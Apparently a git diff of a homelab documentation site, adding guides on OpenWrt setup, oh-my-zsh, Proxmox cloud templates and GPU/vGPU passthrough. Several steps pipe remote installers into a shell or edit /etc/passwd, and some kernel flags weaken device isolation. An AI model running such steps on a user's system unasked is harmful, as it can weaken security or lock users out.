+/etc/init.d/network restart
+
You might as well disable odhcpd:
/etc/init.d/odhcpd disable
+/etc/init.d/odhcpd stop
+
And finally you can delete the IPv6 ULA Prefix:
uci -q delete network.globals.ula_prefix
+uci commit network
+/etc/init.d/network restart
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/openwrt/install-oh-my-zsh/index.html b/infrastructure/openwrt/install-oh-my-zsh/index.html
new file mode 100644
index 000000000..c7efcafe2
--- /dev/null
+++ b/infrastructure/openwrt/install-oh-my-zsh/index.html
@@ -0,0 +1,176 @@
+
oh-my-zsh Install - 3os template markdown Authors: fire1ce | Created: 2022-04-03 | Last update: 2022-12-15 Install oh-my-zsh on OpenWrt You can install oh-my-zsh on OpenWrt, make sure to use the Prevent User Lockout
option since many users been locked out of their sessions since the zsh
shell was not installed or loaded properly.
Whats' ZSH Z-shell (Zsh) configuration. is a Unix shell that can be used as an interactive login shell and as a shell scripting command interpreter. Zsh is an enhanced Bourne shell with many enhancements, including some Bash, ksh and tcsh features.
What's Oh-My-Zsh Oh My Zsh is an open source, community-driven framework for managing your zsh configuration.
Installation of oh-my-zsh Install Requirements Packages
opkg update && opkg install ca-certificates zsh curl git-http
+
Install oh-my-zsh
sh -c " $( curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh) "
+
Set zsh as default (thanks to @mlouielu )
which zsh && sed -i -- 's:/bin/ash:' ` which zsh` ':g' /etc/passwd
+
Prevent User Lockout To prevent lock-outs after accidentially removing zsh (thanks to @fox34 ) (as explained in the wiki you can add a check for zsh
and fallback to ash
in /etc/rc.local
:
# Revert root shell to ash if zsh is not available
+if grep -q '^root:.*:/usr/bin/zsh$' /etc/passwd && [ ! -x /usr/bin/zsh ] ; then
+ # zsh is root shell, but zsh was not found or not executable: revert to default ash
+ [ -x /usr/bin/logger ] && /usr/bin/logger -s "Reverting root shell to ash, as zsh was not found on the system"
+ sed -i -- 's:/usr/bin/zsh:/bin/ash:g' /etc/passwd
+fi
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/openwrt/snippets/index.html b/infrastructure/openwrt/snippets/index.html
new file mode 100644
index 000000000..6c5a1eca4
--- /dev/null
+++ b/infrastructure/openwrt/snippets/index.html
@@ -0,0 +1,171 @@
+
Snippets - 3os template markdown Authors: fire1ce | Created: 2022-12-15 | Last update: 2022-12-19 Snippets and Tips OpenWrt Snippets with useful commands and scripts. Best practices and tips.
Update all packages on OpenWrt from SSH opkg update && opkg list-upgradable | cut -f 1 -d ' ' | xargs opkg upgrade
+
Enable LuCI HTTPS redirect from HTTP This will activate the HTTPS redirect from HTTP in LuCI.
uci set uhttpd.main.redirect_https= 1
+uci commit uhttpd
+service uhttpd reload
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/cloud-image-template/index.html b/infrastructure/proxmox/cloud-image-template/index.html
new file mode 100644
index 000000000..97b9f6498
--- /dev/null
+++ b/infrastructure/proxmox/cloud-image-template/index.html
@@ -0,0 +1,179 @@
+
Cloud Image Template - 3os proxmox virtualization Authors: fire1ce | Created: 2022-06-26 | Last update: 2022-06-27 Proxmox Cloud Image Template About Cloud Images Cloud images are operating system templates and every instance starts out as an identical clone of every other instance. It is the user data that gives every cloud instance its personality and cloud-init is the tool that applies user data to your instances automatically.
Advantage of Cloud Image Template Predefined SSH keys Predefined user account Predefined network configuration VM creation time is under few minutes No installation process required like with ISO images First boot always updated with latest updates Ubuntu Cloud Images Ubuntu provides official cloud images you can find the proper image for your needs at cloud-images.ubuntu.com .
In this tutorial we will be using Ubuntu Server 22.04 LTS Jammy Jellyfish
cloud image.
Create Cloud Image Template SSH to you Proxmox server.
Download the cloud image template from the official website.
wget https://cloud-images.ubuntu.com/jammy/current/jammy-server-cloudimg-amd64.img
+
In order to create a cloud image template first of all we need to create a new VM
. After we will configure it we will create a Template
from it.
The following parameters will predefine our Base Template
Command parameters description:
9000 : VM ID in Proxmox. I prefer to use high number for management purposes. memory : VM's memory in MB. core : Number of CPU cores for the VM. name : Name of the VM and the template. net0 : Network interface for the VM. bridge : Network bridge for the VM. agent : Enable or disable QEMU agent support. onboot : Enable or disable VM start on boot. Create a new virtual machine.
qm create 9000 --memory 2048 --core 2 --name ubuntu-22.04-cloud --net0 virtio,bridge= vmbr0 --agent enabled = 1 --onboot 1
+
The default storage Proxmox creates for vm is storage1 . In my case I use different storage for vm's and templates named storage1 . The following commands will utilize the storage1 storage. Change the storage name for your Proxmox server.
Import the downloaded Ubuntu Cloud Image
we downloaded before disk to the storage.
qm importdisk 9000 jammy-server-cloudimg-amd64.img storage1
+
Attach the new disk to the vm as a scsi
drive on the scsi
controller
qm set 9000 --scsihw virtio-scsi-pci --scsi0 storage1:vm-9000-disk-0
+
Add cloud init drive
qm set 9000 --ide2 storage1:cloudinit
+
Make the cloud init drive bootable and restrict BIOS to boot from disk only
qm set 9000 --boot c --bootdisk scsi0
+
Add serial console
qm set 9000 --serial0 socket --vga serial0
+
WARNING: DO NOT START THE VM
Powering on the vm will create a unique ID that will presist with the template. We want to avoid this.
Now had to the Proxmox web interface. Select the new vm and Cloud-Init
tab.
Configure the default setting for the cloud image template. This will allow the VM to start with predefined user, password, ssh keys and network configuration.
At this point we configured the VM and we can create a cloud image template from it.
Create a new cloud image template.
Now you can use the Cloud Image Template to create new vm instances. You can do it from the Proxmox web interface or from the command line.
Tip
Use Full Clone when creating a new VM from a cloud image template. Linked Clone will privent you from deleting the cloud image template.
Cli example:
qm clone 9000 122 --name my-new-vm --full
+
VM's Storage Since we are using a minimal cloud image template. Cloned VM's will use the same storage as the template which is about 2GB of disk space.
You can utilize an automated script to to expand the disk space of the cloned VM: VM Disk Expander
Troubleshooting Reseting VM's machine-id
Run the following command inside the VM to reset the machine-id.
sudo rm -f /etc/machine-id
+sudo rm -f /var/lib/dbus/machine-id
+
Shutdown the VM. Then power it back on. The machine-id will be regenerated.
If the machine-id is not regenerated you can try to fix it by running the following command.
sudo systemd-machine-id-setup
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/index.html b/infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/index.html
new file mode 100644
index 000000000..8d01caf29
--- /dev/null
+++ b/infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/index.html
@@ -0,0 +1,227 @@
+
GPU Passthrough to VM - 3os proxmox gpu passthrough Authors: fire1ce | Created: 2021-08-27 | Last update: 2023-07-13 Proxmox GPU Passthrough to VM Introduction GPU passthrough is a technology that allows the Linux kernel to present the internal PCI GPU directly to the virtual machine. The device behaves as if it were powered directly by the virtual machine, and the virtual machine detects the PCI device as if it were physically connected. We will cover how to enable GPU passthrough to a virtual machine in Proxmox VE.
Your mileage may vary depending on your hardware.
Proxmox Configuration for GPU Passthrough The following examples uses SSH
connection to the Proxmox server. The editor is nano
but feel free to use any other editor. We will be editing the grub
configuration file.
Find the PCI address of the GPU Device. The following command will show the PCI address of the GPU devices in Proxmox server:
Find the GPU you want to passthrough in result ts should be similar to this:
01 :00.0 VGA compatible controller [ 0300 ] : NVIDIA Corporation TU104 [ GeForce RTX 2080 SUPER] [ 10de:1e81] ( rev a1) ( prog-if 00 [ VGA controller])
+
What we are looking is the PCI address of the GPU device. In this case it's 01:00.0
. 01:00.0
is only a part of of a group of PCI devices on the GPU. We can list all the devices in the group 01:00
by using the following command:
The usual output will include VGA Device and Audio Device. In my case, we have a USB Controller and a Serial bus controller:
01 :00.0 VGA compatible controller: NVIDIA Corporation TU104 [ GeForce RTX 2080 SUPER] ( rev a1)
+01 :00.1 Audio device: NVIDIA Corporation TU104 HD Audio Controller ( rev a1)
+01 :00.2 USB controller: NVIDIA Corporation TU104 USB 3 .1 Host Controller ( rev a1)
+01 :00.3 Serial bus controller [ 0c80] : NVIDIA Corporation TU104 USB Type-C UCSI Controller ( rev a1)
+
Now we need to get the id's of those devices. We can do this by using the following command:
The output should look similar to this:
01 :00.0 0300 : 10de:1e81 ( rev a1)
+01 :00.1 0403 : 10de:10f8 ( rev a1)
+01 :00.2 0c03: 10de:1ad8 ( rev a1)
+01 :00.3 0c80: 10de:1ad9 ( rev a1)
+
What we are looking are the pairs, we will use those id to split the PCI Group to separate devices.
10de:1e81,10de:10f8,10de:1ad8,10de:1ad9
+
Now it's time to edit the grub
configuration file.
Find the line that starts with GRUB_CMDLINE_LINUX_DEFAULT
by default they should look like this:
GRUB_CMDLINE_LINUX_DEFAULT = "quiet"
+
Then change it to look like this (Intel CPU example) and replace vfio-pci.ids=
with the ids for the GPU you want to passthrough:
GRUB_CMDLINE_LINUX_DEFAULT = "quiet intel_iommu=on pcie_acs_override=downstream,multifunction video=efifb:off video=vesa:off vfio-pci.ids=10de:1e81,10de:10f8,10de:1ad8,10de:1ad9 vfio_iommu_type1.allow_unsafe_interrupts=1 kvm.ignore_msrs=1 modprobe.blacklist=radeon,nouveau,nvidia,nvidiafb,nvidia-gpu"
+
Save the config changed and then update GRUB.
Next we need to add vfio
modules to allow PCI passthrough.
Edit the /etc/modules
file.
Add the following line to the end of the file:
# Modules required for PCI passthrough
+vfio
+vfio_iommu_type1
+vfio_pci
+vfio_virqfd
+
Save and exit the editor.
Update configuration changes made in your /etc filesystem
update-initramfs -u -k all
+
Reboot Proxmox to apply the changes
Verify that IOMMU is enabled
dmesg | grep -e DMAR -e IOMMU
+
There should be a line that looks like DMAR: IOMMU enabled
. If there is no output, something is wrong.
[ 0 .000000] Warning: PCIe ACS overrides enabled; This may allow non-IOMMU protected peer-to-peer DMA
+[ 0 .067203] DMAR: IOMMU enabled
+[ 2 .573920] pci 0000 :00:00.2: AMD-Vi: IOMMU performance counters supported
+[ 2 .580393] pci 0000 :00:00.2: AMD-Vi: Found IOMMU cap 0x40
+[ 2 .581776] perf/amd_iommu: Detected AMD IOMMU #0 (2 banks, 4 counters/bank).
+
Check that the GPU is in a separate IOMMU Group by using the following command:
#!/bin/bash
+shopt -s nullglob
+for g in $( find /sys/kernel/iommu_groups/* -maxdepth 0 -type d | sort -V) ; do
+ echo "IOMMU Group ${ g ##*/ } :"
+ for d in $g /devices/*; do
+ echo -e "\t $( lspci -nns ${ d ##*/ } ) "
+ done ;
+done ;
+
Now your Proxmox host should be ready to GPU passthrough!
Windows Virtual Machine GPU Passthrough Configuration For better results its recommend to use this Windwos 10/11 Virutal Machine configuration for proxmox .
Limitations & Workarounds
In order for the GPU to to function properly in the VM, you must disable Proxmox's Virutal Display - Set it none
.
You will lose the ability to conect to the VM via Proxmox's Console.
Display must be conected to the physical output of the GPU for the Windows Host to initialize the GPU properly.
You can use a HDMI Dummy Plug as a workaround - It will present itself as a HDMI Display to the Windows Host.
Make sure you have alternative way to connect to the VM for example via Remote Desktop (RDP).
Find the PCI address of the GPU.
This should result in output similar to this:
01 :00.0 VGA compatible controller [ 0300 ] : NVIDIA Corporation TU104 [ GeForce RTX 2080 SUPER] [ 10de:1e81] ( rev a1) ( prog-if 00 [ VGA controller])
+
If you have multiple VGA, look for the one that has the Intel
in the name. Here, the PCI address of the GPU is 01:00.0
.
For best performance the VM should be configured the Machine
type to q35 . This will allow the VM to utilize PCI-Express passthrough.
Open the web gui and navigate to the Hardware
tab of the VM you want to add a vGPU. Click Add
above the device list and then choose PCI Device
Open the Device
dropdown and select the GPU, which you can find using it’s PCI address. This list uses a different format for the PCI addresses id, 01:00.0
is listed as 0000:01:00.0
.
Select All Functions
, ROM-Bar
, Primary GPU
, PCI-Express
and then click Add
.
The Windows Virtual Machine Proxmox Setting should look like this:
Power on the Windows Virtual Machine.
Connect to the VM via Remote Desktop (RDP) or any other remote access protocol you prefer. Install the latest version of GPU Driver for your GPU.
If all when well you should see the following output in Device Manager
and GPU-Z :
That's it!
Linux Virtual Machine GPU Passthrough Configuration We will be using Ubuntu Server 20.04 LTS. for this guide.
From Proxmox Terminal find the PCI address of the GPU.
This should result in output similar to this:
01 :00.0 VGA compatible controller [ 0300 ] : NVIDIA Corporation TU104 [ GeForce RTX 2080 SUPER] [ 10de:1e81] ( rev a1) ( prog-if 00 [ VGA controller])
+
If you have multiple VGA, look for the one that has the Intel
in the name. Here, the PCI address of the GPU is 01:00.0
.
For best performance the VM should be configured the Machine
type to q35 . This will allow the VM to utilize PCI-Express passthrough.
Open the Device
dropdown and select the GPU, which you can find using it’s PCI address. This list uses a different format for the PCI addresses id, 01:00.0
is listed as 0000:01:00.0
.
Select All Functions
, ROM-Bar
, PCI-Epress
and then click Add
.
The Ubuntu Virtual Machine Proxmox Setting should look like this:
Boot the VM. To test the GPU passthrough was successful, you can use the following command in the VM:
sudo lspci -nnv | grep VGA
+
The output should incliude the GPU:
01 :00.0 VGA compatible controller [ 0300 ] : NVIDIA Corporation TU104 [ GeForce RTX 2080 SUPER] [ 10de:1e81] ( rev a1) ( prog-if 00 [ VGA controller])
+
Now we need to install the GPU Driver. I'll be covering the installation of Nvidia Drivers in the next example.
Search for the latest Nvidia Driver for your GPU.
sudo apt search nvidia-driver
+
In the next step we will install the Nvidia Driver v535.
Note
--no-install-recommends is important for Headless Server. nvidia-driver-535
will install xorg (GUI) --no-install-recommends
flag will prevent the GUI from being installed.
sudo apt install --no-install-recommends -y build-essential nvidia-driver-535 nvidia-headless-535 nvidia-utils-535 nvidia-cuda-toolkit
+
This will take a while to install. After the installation is complete, you should reboot the VM.
Now let's test the Driver initalization. Run the following command in the VM:
nvidia-smi && nvidia-smi -L
+
If all went well you should see the following output:
That's it! You should now be able to use the GPU for hardware acceleration inside the VM.
Debug Dbug Messages - Shows Hardware initialization and errors
Display PCI devices information
Display Driver in use for PCI devices
Display IOMMU Groups the PCI devices are assigned to
#!/bin/bash
+shopt -s nullglob
+for g in $( find /sys/kernel/iommu_groups/* -maxdepth 0 -type d | sort -V) ; do
+ echo "IOMMU Group ${ g ##*/ } :"
+ for d in $g /devices/*; do
+ echo -e "\t $( lspci -nns ${ d ##*/ } ) "
+ done ;
+done ;
+
Reboot Proxmox to apply the changes
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/index.html b/infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/index.html
new file mode 100644
index 000000000..727bf4059
--- /dev/null
+++ b/infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/index.html
@@ -0,0 +1,202 @@
+
iGPU Passthrough to VM - 3os proxmox igpu passthrough iGPU Passthrough to VM (Intel Integrated Graphics) Introduction Intel Integrated Graphics (iGPU) is a GPU that is integrated into the CPU. The GPU is a part of the CPU and is used to render graphics. Proxmox may be configured to use iGPU passthrough to VM to allow the VM to use the iGPU for hardware acceleration for example using video encoding/decoding and Transcoding for series like Plex and Emby. This guide will show you how to configure Proxmox to use iGPU passthrough to VM.
Your mileage may vary depending on your hardware. The following guide was tested with Intel Gen8 CPU.
There are two ways to use iGPU passthrough to VM. The first way is to use the Full iGPU Passthrough
to VM. The second way is to use the iGPU GVT-g
technology which allows as to split the iGPU into two parts. We will be covering the Full iGPU Passthrough
. If you want to use the split iGPU GVT-g Passthrough
you can find the guide here .
Proxmox Configuration for iGPU Full Passthrough The following examples uses SSH
connection to the Proxmox server. The editor is nano
but feel free to use any other editor. We will be editing the grub
configuration file.
Edit the grub
configuration file.
Find the line that starts with GRUB_CMDLINE_LINUX_DEFAULT
by default they should look like this:
GRUB_CMDLINE_LINUX_DEFAULT = "quiet"
+
We want to allow passthrough
and Blacklists
known graphics drivers to prevent proxmox from utilizing the iGPU.
Warning
You will loose the ability to use the onboard graphics card to access the Proxmox's console since Proxmox won't be able to use the Intel's gpu
Your GRUB_CMDLINE_LINUX_DEFAULT
should look like this:
GRUB_CMDLINE_LINUX_DEFAULT = "quiet intel_iommu=on iommu=pt pcie_acs_override=downstream,multifunction initcall_blacklist=sysfb_init video=simplefb:off video=vesafb:off video=efifb:off video=vesa:off disable_vga=1 vfio_iommu_type1.allow_unsafe_interrupts=1 kvm.ignore_msrs=1 modprobe.blacklist=radeon,nouveau,nvidia,nvidiafb,nvidia-gpu,snd_hda_intel,snd_hda_codec_hdmi,i915"
+
Note
This will blacklist most of the graphics drivers from proxmox. If you have a specific driver you need to use for Proxmox Host you need to remove it from modprobe.blacklist
Save and exit the editor.
Update the grub configuration to apply the changes the next time the system boots.
Next we need to add vfio
modules to allow PCI passthrough.
Edit the /etc/modules
file.
Add the following line to the end of the file:
# Modules required for PCI passthrough
+vfio
+vfio_iommu_type1
+vfio_pci
+vfio_virqfd
+
Update configuration changes made in your /etc filesystem
update-initramfs -u -k all
+
Save and exit the editor.
Reboot Proxmox to apply the changes
Verify that IOMMU is enabled
dmesg | grep -e DMAR -e IOMMU
+
There should be a line that looks like DMAR: IOMMU enabled
. If there is no output, something is wrong.
[ 0 .000000] Warning: PCIe ACS overrides enabled; This may allow non-IOMMU protected peer-to-peer DMA
+[ 0 .067203] DMAR: IOMMU enabled
+[ 2 .573920] pci 0000 :00:00.2: AMD-Vi: IOMMU performance counters supported
+[ 2 .580393] pci 0000 :00:00.2: AMD-Vi: Found IOMMU cap 0x40
+[ 2 .581776] perf/amd_iommu: Detected AMD IOMMU #0 (2 banks, 4 counters/bank).
+
Windows Virtual Machine iGPU Passthrough Configuration For better results its recommend to use this Windows 10/11 Virtual Machine configuration for proxmox .
Find the PCI address of the iGPU.
This should result in output similar to this:
00 :02.0 VGA compatible controller [ 0300 ] : Intel Corporation CometLake-S GT2 [ UHD Graphics 630 ] [ 8086 :3e92] ( prog-if 00 [ VGA controller])
+
If you have multiple VGA, look for the one that has the Intel
in the name. Here, the PCI address of the iGPU is 00:02.0
.
For best performance the VM should be configured the Machine
type to q35 . This will allow the VM to utilize PCI-Express passthrough.
Open the web gui and navigate to the Hardware
tab of the VM you want to add a vGPU. Click Add
above the device list and then choose PCI Device
Open the Device
dropdown and select the iGPU, which you can find using it’s PCI address. This list uses a different format for the PCI addresses id, 00:02.0
is listed as 0000:00:02.0
.
Select All Functions
, ROM-Bar
, PCI-Express
and then click Add
.
Tip
I've found that the most consistent way to utilize the GPU acceleration is to disable Proxmox's Virtual Graphics card of the vm. The drawback of disabling the Virtual Graphics card is that it will not be able to access the vm via proxmox's vnc console. The workaround is to enable Remote Desktop (RDP) on the VM before disabling the Virtual Graphics card and accessing the VM via RDP or use any other remove desktop client. If you loose the ability to access the VM via RDP you can temporarily remove the GPU PCI Device and re-enable the virtual graphics card
The Windows Virtual Machine Proxmox Setting should look like this:
Power on the Windows Virtual Machine.
Connect to the VM via Remote Desktop (RDP) or any other remote access protocol you prefer. Install the latest version of Intel's Graphics Driver or use the Intel Driver & Support Assistant installer.
If all when well you should see the following output in Device Manager
and GPU-Z :
That's it!
Linux Virtual Machine iGPU Passthrough Configuration We will be using Ubuntu Server 20.04 LTS for this guide.
From Proxmox Terminal find the PCI address of the iGPU.
This should result in output similar to this:
00 :02.0 VGA compatible controller [ 0300 ] : Intel Corporation CometLake-S GT2 [ UHD Graphics 630 ] [ 8086 :3e92] ( prog-if 00 [ VGA controller])
+
If you have multiple VGA, look for the one that has the Intel
in the name. Here, the PCI address of the iGPU is 00:02.0
.
Open the Device
dropdown and select the iGPU, which you can find using it’s PCI address. This list uses a different format for the PCI addresses id, 00:02.0
is listed as 0000:00:02.0
.
Select All Functions
, ROM-Bar
and then click Add
.
The Ubuntu Virtual Machine Proxmox Setting should look like this:
Boot the VM. To test the iGPU passthrough was successful, you can use the following command:
sudo lspci -nnv | grep VGA
+
The output should include the Intel iGPU:
00 :10.0 VGA compatible controller [ 0300 ] : Intel Corporation UHD Graphics 630 ( Desktop) [ 8086 :3e92] ( prog-if 00 [ VGA controller])
+
Now we need to check if the GPU's Driver initalization is working.
The output should include the renderD128
That's it! You should now be able to use the iGPU for hardware acceleration inside the VM and still have proxmox's output on the screen.
Debug Dbug Messages - Shows Hardware initialization and errors
Display PCI devices information
Display Driver in use for PCI devices
Display IOMMU Groups the PCI devices are assigned to
#!/bin/bash
+shopt -s nullglob
+for g in $( find /sys/kernel/iommu_groups/* -maxdepth 0 -type d | sort -V) ; do
+ echo "IOMMU Group ${ g ##*/ } :"
+ for d in $g /devices/*; do
+ echo -e "\t $( lspci -nns ${ d ##*/ } ) "
+ done ;
+done ;
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/index.html b/infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/index.html
new file mode 100644
index 000000000..744480cc0
--- /dev/null
+++ b/infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/index.html
@@ -0,0 +1,205 @@
+
iGPU Split Passthrough - 3os proxmox igpu passthrough iGPU Split Passthrough (Intel Integrated Graphics) Introduction Intel Integrated Graphics (iGPU) is a GPU that is integrated into the CPU. The GPU is a part of the CPU and is used to render graphics. Proxmox may be configured to use iGPU split passthrough to VM to allow the VM to use the iGPU for hardware acceleration for example using video encoding/decoding and Transcoding for series like Plex and Emby. This guide will show you how to configure Proxmox to use iGPU passthrough to VM.
Your mileage may vary depending on your hardware. The following guide was tested with Intel Gen8 CPU.
Supported CPUs
iGPU GVT-g Split Passthrough
is supported only on Intel's 5th generation to 10th generation CPUs!
Known supported CPU families:
Broadwell
Skylake
Kaby Lake
Coffee Lake
Comet Lake
There are two ways to use iGPU passthrough to VM. The first way is to use the Full iGPU Passthrough
to VM. The second way is to use the iGPU GVT-g
technology which allows as to split the iGPU into two parts. We will be covering the Split iGPU Passthrough
. If you want to use the split Full iGPU Passthrough
you can find the guide here .
Proxmox Configuration for GVT-g Split Passthrough The following examples uses SSH
connection to the Proxmox server. The editor is nano
but feel free to use any other editor. We will be editing the grub
configuration file.
Edit the grub
configuration file.
Find the line that starts with GRUB_CMDLINE_LINUX_DEFAULT
by default they should look like this:
GRUB_CMDLINE_LINUX_DEFAULT = "quiet"
+
We want to allow passthrough
and Blacklists
known graphics drivers to prevent proxmox from utilizing the iGPU.
Your GRUB_CMDLINE_LINUX_DEFAULT
should look like this:
GRUB_CMDLINE_LINUX_DEFAULT = "quiet intel_iommu=on i915.enable_gvt=1 iommu=pt pcie_acs_override=downstream,multifunction video=efifb:off video=vesa:off vfio_iommu_type1.allow_unsafe_interrupts=1 kvm.ignore_msrs=1 modprobe.blacklist=radeon,nouveau,nvidia,nvidiafb,nvidia-gpu"
+
Note
This will blacklist most of the graphics drivers from proxmox. If you have a specific driver you need to use for Proxmox Host you need to remove it from modprobe.blacklist
Save and exit the editor.
Update the grub configuration to apply the changes the next time the system boots.
Next we need to add vfio
modules to allow PCI passthrough.
Edit the /etc/modules
file.
Add the following line to the end of the file:
# Modules required for PCI passthrough
+vfio
+vfio_iommu_type1
+vfio_pci
+vfio_virqfd
+
+# Modules required for Intel GVT-g Split
+kvmgt
+
Save and exit the editor.
Update configuration changes made in your /etc filesystem
update-initramfs -u -k all
+
Reboot Proxmox to apply the changes
Verify that IOMMU is enabled
dmesg | grep -e DMAR -e IOMMU
+
There should be a line that looks like DMAR: IOMMU enabled
. If there is no output, something is wrong.
[ 0 .000000] Warning: PCIe ACS overrides enabled; This may allow non-IOMMU protected peer-to-peer DMA
+[ 0 .067203] DMAR: IOMMU enabled
+[ 2 .573920] pci 0000 :00:00.2: AMD-Vi: IOMMU performance counters supported
+[ 2 .580393] pci 0000 :00:00.2: AMD-Vi: Found IOMMU cap 0x40
+[ 2 .581776] perf/amd_iommu: Detected AMD IOMMU #0 (2 banks, 4 counters/bank).
+
Windows Virtual Machine iGPU Passthrough Configuration For better results its recommend to use this Windwos 10/11 Virutal Machine configuration for proxmox .
Find the PCI address of the iGPU.
This should result in output similar to this:
00 :02.0 VGA compatible controller [ 0300 ] : Intel Corporation CometLake-S GT2 [ UHD Graphics 630 ] [ 8086 :3e92] ( prog-if 00 [ VGA controller])
+
If you have multiple VGA, look for the one that has the Intel
in the name.
Here, the PCI address of the iGPU is 00:02.0
.
For best performance the VM should be configured the Machine
type to q35 . This will allow the VM to utilize PCI-Express passthrough.
Open the web gui and navigate to the Hardware
tab of the VM you want to add a vGPU. Click Add
above the device list and then choose PCI Device
Open the Device
dropdown and select the iGPU, which you can find using it’s PCI address. This list uses a different format for the PCI addresses id, 00:02.0
is listed as 0000:00:02.0
.
Click Mdev Type
, You should be presented with a list of the available split passthrough devices choose the better performing one for the vm.
Select ROM-Bar
, PCI-Express
and then click Add
.
The Windows Virtual Machine Proxmox Setting should look like this:
Power on the Windows Virtual Machine.
Open the VM's Console. Install the latest version of Intel's Graphics Driver or use the Intel Driver & Support Assistant installer.
If all when well you should see the following output in Device Manager
and GPU-Z :
That's it! You should now be able to use the iGPU for hardware acceleration inside the VM and still have proxmox's output on the screen.
Linux Virtual Machine iGPU Passthrough Configuration We will be using Ubuntu Server 20.04 LTS for this guide.
From Proxmox Terminal find the PCI address of the iGPU.
This should result in output similar to this:
00 :02.0 VGA compatible controller [ 0300 ] : Intel Corporation CometLake-S GT2 [ UHD Graphics 630 ] [ 8086 :3e92] ( prog-if 00 [ VGA controller])
+
If you have multiple VGA, look for the one that has the Intel
in the name.
Here, the PCI address of the iGPU is 00:02.0
.
VM should be configured the Machine
type to i440fx . Open the web gui and navigate to the Hardware
tab of the VM you want to add a vGPU to. Click Add
above the device list and then choose PCI Device
Open the Device
dropdown and select the iGPU, which you can find using it’s PCI address. This list uses a different format for the PCI addresses id, 00:02.0
is listed as 0000:00:02.0
.
Click Mdev Type
, You should be presented with a list of the available split passthrough devices choose the better performing one for the vm.
Select ROM-Bar
, and then click Add
.
The Ubuntu Virtual Machine Proxmox Setting should look like this:
Boot the VM. To test the iGPU passthrough was successful, you can use the following command:
sudo lspci -nnv | grep VGA
+
The output should incliude the Intel iGPU:
00 :10.0 VGA compatible controller [ 0300 ] : Intel Corporation UHD Graphics 630 ( Desktop) [ 8086 :3e92] ( prog-if 00 [ VGA controller])
+
Now we need to check if the GPU's Driver initalization is working.
The output should incliude the renderD128
That's it! You should now be able to use the iGPU for hardware acceleration inside the VM and still have proxmox's output on the screen.
Debug Dbug Messages - Shows Hardware initialization and errors
Display PCI devices information
Display Driver in use for PCI devices
Display IOMMU Groups the PCI devices are assigned to
#!/bin/bash
+shopt -s nullglob
+for g in $( find /sys/kernel/iommu_groups/* -maxdepth 0 -type d | sort -V) ; do
+ echo "IOMMU Group ${ g ##*/ } :"
+ for d in $g /devices/*; do
+ echo -e "\t $( lspci -nns ${ d ##*/ } ) "
+ done ;
+done ;
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/index.html b/infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/index.html
new file mode 100644
index 000000000..e60eca4dd
--- /dev/null
+++ b/infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/index.html
@@ -0,0 +1,336 @@
+
vGPU Split Passthrough - 3os proxmox vgpu passthrough Authors: fire1ce | Created: 2022-12-03 | Last update: 2023-01-18 vGPU Split Passthrough (Nvidia) Credit and Thanks Thanks to @polloloco for creating and maintaining this guide.
Official GitLab repository: polloloco/vgpu-proxmox
NVIDIA vGPU with the GRID
This document serves as a guide to install NVIDIA vGPU host drivers on the latest Proxmox VE version, at time of writing this its pve 8.0.
You can follow this guide if you have a vGPU supported card from this list , or if you are using a consumer GPU from the GeForce series or a non-vGPU qualified Quadro GPU. There are several sections with a title similar to "Have a vGPU supported GPU? Read here" in this document, make sure to read those very carefully as this is where the instructions differ for a vGPU qualified card and a consumer card.
Supported cards The following consumer/not-vGPU-qualified NVIDIA GPUs can be used with vGPU: - Most GPUs from the Maxwell 2.0 generation (GTX 9xx, Quadro Mxxxx, Tesla Mxx) EXCEPT the GTX 970 - All GPUs from the Pascal generation (GTX 10xx, Quadro Pxxxx, Tesla Pxx) - All GPUs from the Turing generation (GTX 16xx, RTX 20xx, Txxxx)
If you have GPUs from the Ampere and Ada Lovelace generation, you are out of luck, unless you have a vGPU qualified card from this list like the A5000 or RTX 6000 Ada. If you have one of those cards, please consult the NVIDIA documentation for help with setting it up.
!!! THIS MEANS THAT YOUR RTX 30XX or 40XX WILL NOT WORK !!!
This guide and all my tests were done on a RTX 2080 Ti which is based on the Turing architechture.
Important notes before starting This tutorial assumes you are using a clean install of Proxmox VE 8.0. If you are using Proxmox VE 8.0, you MUST use 16.x drivers. Older versions only work with pve 7 If you tried GPU-passthrough before, you absolutely MUST revert all of the steps you did to set that up. If you only have one GPU in your system with no iGPU, your local monitor will NOT give you any output anymore after the system boots up. Use SSH or a serial connection if you want terminal access to your machine. Most of the steps can be applied to other linux distributions, however I'm only covering Proxmox VE here. Are you upgrading from a previous version of this guide? If you are upgrading from a previous version of this guide, you should uninstall the old driver by running nvidia-uninstall
first.
Then you also have to make sure that you are using the latest version of vgpu_unlock-rs
, otherwise it won't work with the latest driver.
Either delete the folder /opt/vgpu_unlock-rs
or enter the folder and run git pull
and then recompile the library again using cargo build --release
Packages Make sure to add the community pve repo and get rid of the enterprise repo (you can skip this step if you have a valid enterprise subscription)
echo "deb http://download.proxmox.com/debian/pve bookworm pve-no-subscription" >> /etc/apt/sources.list
+rm /etc/apt/sources.list.d/pve-enterprise.list
+
Update and upgrade
apt update
+apt dist-upgrade
+
We need to install a few more packages like git, a compiler and some other tools.
apt install -y git build-essential dkms pve-headers mdevctl
+
Git repos and Rust compiler First, clone this repo to your home folder (in this case /root/
)
git clone https://gitlab.com/polloloco/vgpu-proxmox.git
+
You also need the vgpu_unlock-rs repo
cd /opt
+git clone https://github.com/mbilker/vgpu_unlock-rs.git
+
After that, install the rust compiler
curl https://sh.rustup.rs -sSf | sh -s -- -y --profile minimal
+
Now make the rust binaries available in your $PATH (you only have to do it the first time after installing rust)
source $HOME /.cargo/env
+
